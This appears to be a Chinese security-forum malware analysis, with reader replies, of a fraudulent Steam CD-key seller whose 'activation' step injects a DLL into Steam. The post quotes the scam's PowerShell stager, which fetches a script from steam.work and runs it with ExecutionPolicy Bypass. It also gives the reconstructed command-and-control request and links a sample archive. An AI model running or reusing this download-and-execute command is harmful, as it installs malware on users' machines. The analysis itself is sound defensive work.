吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

上一主题 下一主题

[PC样本分析] 关于 steam.work 激活码诈骗脚本的分析

楼主
MicroBlock 发表于 2024-7-30 12:54 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!

结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,那别去管他,立刻退货并举报商家!原因就直接贴我写这个就行...

该商家在使用 Steam 注入病毒假入库来进行诈骗,证据:https://www.52pojie.cn/thread-1949495-1-1.html 请立即退款,我将会向消费者协会说明本店情况!

## 正文
刚刚去买了个 cdkey 准备送给朋友,结果一看发货介绍感觉有点不对劲:

啥啊,irm iex 这不是经典的从网络获取脚本并执行的操作吗,怎么领个激活码还要搞这?

我一开始还以为是自动安装加速器,商家还怪好的捏,直到我激活不了,把这脚本拉下来看了看:

好家伙 这玩意整了个极其有欺骗性的东西,因为powershell的多行注释正好是<# #>,正好 HTML 文件的开头是 <!DOCTYPE html> 这鸟人给他改成 <#!DOCTYPE html> 就变成 powershell 的注释了.. 我都差点没看出来..网页还做了 UA 判断和跳转,真是够阴损

那么真实的代码就只剩两行了:
[PowerShell] 纯文本查看 复制代码
irm steam.work/pwsDwFile/new1 -OutFile x.ps1
powershell.exe -ExecutionPolicy Bypass -File x.ps1;

看得出来,又是下脚本...我们把这玩意也下下来看一眼:

我怎么兑换个激活码你还给我注入上 Steam了!有病啊!
那么我们便不得不好奇一下注入的文件里到底干了啥呢,我们下下来拖进静态分析,但是里面几乎啥都没有,只有两个有意思的地方:
1. 把危险函数 VirtualAlloc 等 伪装成普通函数:

2. 里面有 zlib.inflate (图里打错了)

看上去他是在尝试现场解压某种payload来执行啊!我们直接开一个 Windows Sandbox 来动态调试一下:
打开 x32dbg,在 zlib.inflate处打断点,很容易就拿到解压出的东西

[eax + 0x4 * 3] -> 解压出缓冲区指针
[eax + 0x4 * 5] -> 解压出数据长度

不看不知道,一看 MZ 开头,PE格式没跑了,直接一个 savefile 把它存下来,拖进 Binary Ninja
这个文件也有点诡异,有三个 .text 段里面两个都是空的,还有一个 XRef 几乎扫不出来...总之先看一眼 IAT:

怎么还引用了一个 winsqlite 啊,看起来像是打算操作 Steam 的数据库?

这里还有一些十足诡异的找不到引用的函数,看上去是加密的字符串

(接前文)
那么自然我们现在应该给导出的仅有的几个函数打一下断点看看;首当其冲怀疑的就是这个网络函数
直接先在该 dll 加载前打断点,暂停后在InternetOpenA打断点;发现有反调试检测,用 ScyllaHide Basic 轻松过掉
然后就断下来了,我们来看一眼

直接找到病毒开始请求配置的地方和端点了,大收获啊;但是我们直接访问 http://api.steam.work/api/integral/vs ,他是返回 403 Unauthorized 的,看来可能有什么 UA,POST body之类的,继续下断点查一下
InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA,成功还原整个请求:

HTTP1.1 POST http://api.steam.work/api/integral/vs
Referer: version
user-agent: steam
{"sign":"ckv"}

返回值拿到手,只有一串不知道是什么的 hex;我们先再看看其他几个点
sqlite这边下断点以后啥也没有,可能是激活的时候才会操作(我用的Windows Sandbox,不知道为什么打不开Steam……)

于是转移到一台实机上继续分析。

直接拿它给的虚假激活码来激活,可以直接断在 HTTP 请求点
把请求掏出来看看:

看起来是成功了,返回一个 code 和一个 data;
这个 ID 又是啥?

哦,哈迪斯的 App ID
那么接着调试,在一通奇奇怪怪的网络请求之后,它下下来一个 8k 的文件到 steam 的目录里
C:\Program Files (x86)\Steam\package\data

这是干啥的呢?看看我们正常的 Steam 这里有什么...居然什么都没有!
那么就说明,这个文件是病毒专用的了;我们直接 ImHex 打开

居然是个数据库!怪不得他要链 winsqlite;那这个数据库里有啥?我们丢进查看器:

有个appid,和两个不认识的hex;把键名拿去搜搜看:

原来是这样!这是一种叫做“清单入库”的已经广为流传的Steam免费入库方式,结果被不法商家用于欺诈消费者,十分恶劣!

还有一些相关信息,大家可以自行查看→ https://github.com/pjy612/SteamManifestCache/discussions/374 https://github.com/pjy612/SteamManifestCache/wiki/DecryptionKey

病毒样本
密码 52pojie
virus.zip (1.51 MB, 下载次数: 22)

完结撒花~

免费评分

YP981123 + 1 + 1 谢谢@Thanks!
77794aa + 1 + 1 我很赞同!
dylanquan + 1 + 1 用心讨论,共获提升!
Hmily + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
画风 + 1 + 1 谢谢@Thanks!
fjtu04 + 1 + 1 用心讨论,共获提升!
FFF全部成为F + 1 + 1 用心讨论,共获提升!
带司 + 1 + 1 谢谢@Thanks!
myq12366 + 1 + 1 我很赞同!
Issacclark1 + 1 谢谢@Thanks!
Dom-Lewis + 1 + 1 我很赞同!
arctan1 + 1 + 1 谢谢@Thanks!
princekin + 1 + 1 谢谢@Thanks!
Molishark + 1 + 1 谢谢@Thanks!
zbssny + 1 + 1 谢谢@Thanks!
zipx + 1 + 1 我很赞同!
Brashcx + 1 我很赞同!
panty + 1 + 1 谢谢@Thanks!
xiefeixy + 1 + 1 用心讨论,共获提升!
jianggu + 1 我很赞同!
2009032848 + 1 + 1 谢谢@Thanks!
cirnocirno + 1 + 1 谢谢@Thanks!
CloverYan + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Fadelog + 1 + 1 我很赞同!
FateDeath + 1 + 1 热心回复!
kson + 1 谢谢@Thanks!
QAQ1433223 + 1 + 1 我很赞同!
ilharp + 1 + 1 用心讨论,共获提升!
Du_Xiang + 1 + 1 主包主包你好棒
nonefree + 1 用心讨论,共获提升!
Release0x7C00 + 1 + 1 用心讨论,共获提升!

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
wangshi12138 发表于 2024-7-30 20:23
原来如此,学到了,怪不得淘宝那些价格贼便宜,太抽象了。
推荐
dg69m 发表于 2024-7-30 15:44
感谢分享,我要转发给我孩子,免得玩游戏,胡乱花钱,还上当
推荐
 楼主| MicroBlock 发表于 2024-7-30 21:47 |楼主
xdea 发表于 2024-7-30 21:40
厉害了,这种远程脚本系统杀毒软件不会自动拦吗

Windows Defender会自动加入白名单
360他会...让你自己把他关掉...无语
推荐
hellx 发表于 2024-7-30 17:00
所以你举报商家是咋写的?没看到那
推荐
 楼主| MicroBlock 发表于 2024-7-30 22:34 |楼主
zbby 发表于 2024-7-30 22:28
压缩的那个dll是从那个hid文件里解压出来的,看上去这个dll好像加了个压缩壳之类的东西

嗯,我知道
推荐
 楼主| MicroBlock 发表于 2024-7-30 20:22 |楼主
好好学习多挣钱 发表于 2024-7-30 16:12
它是给steam注入代码,导致steam弹出垃圾广告。
比如这篇新闻:https://baijiahao.baidu.com/s?id=1797118 ...

反正首先是弄了假激活...有没有广告就没关注
(因为都是在虚拟机挂着调试器调的,可能没给他机会弹广告
推荐
crapeber 发表于 2024-8-1 23:52
之前分析的时候就被这睿智HTML混淆绕进去了,找不到入口在哪
感觉很多骗子自己都不知道这些,纯倒狗一个
aaking 发表于 2024-7-30 15:17
6666,淘宝上经常有卖这种的,能骗一个是一个
瞧,他哭了。 发表于 2024-7-30 15:25
百度网盘会员的也是经常套路,百度官方有领取几天会员活动的时候,这些js就开始搞事卖号了
好好学习多挣钱 发表于 2024-7-30 16:12
它是给steam注入代码,导致steam弹出垃圾广告。
比如这篇新闻:https://baijiahao.baidu.com/s?id=1797118649311302828
noeasy911 发表于 2024-7-30 16:40
买游戏还得注意了以后
wxai91 发表于 2024-7-30 17:16
虽然看不懂,但感觉很NB
jituidadada 发表于 2024-7-30 17:23
你这个帖子很实用。赞一个
yeyerl 发表于 2024-7-30 17:24
楼主牛啊,这种都被发现了,看来我也要好好学习下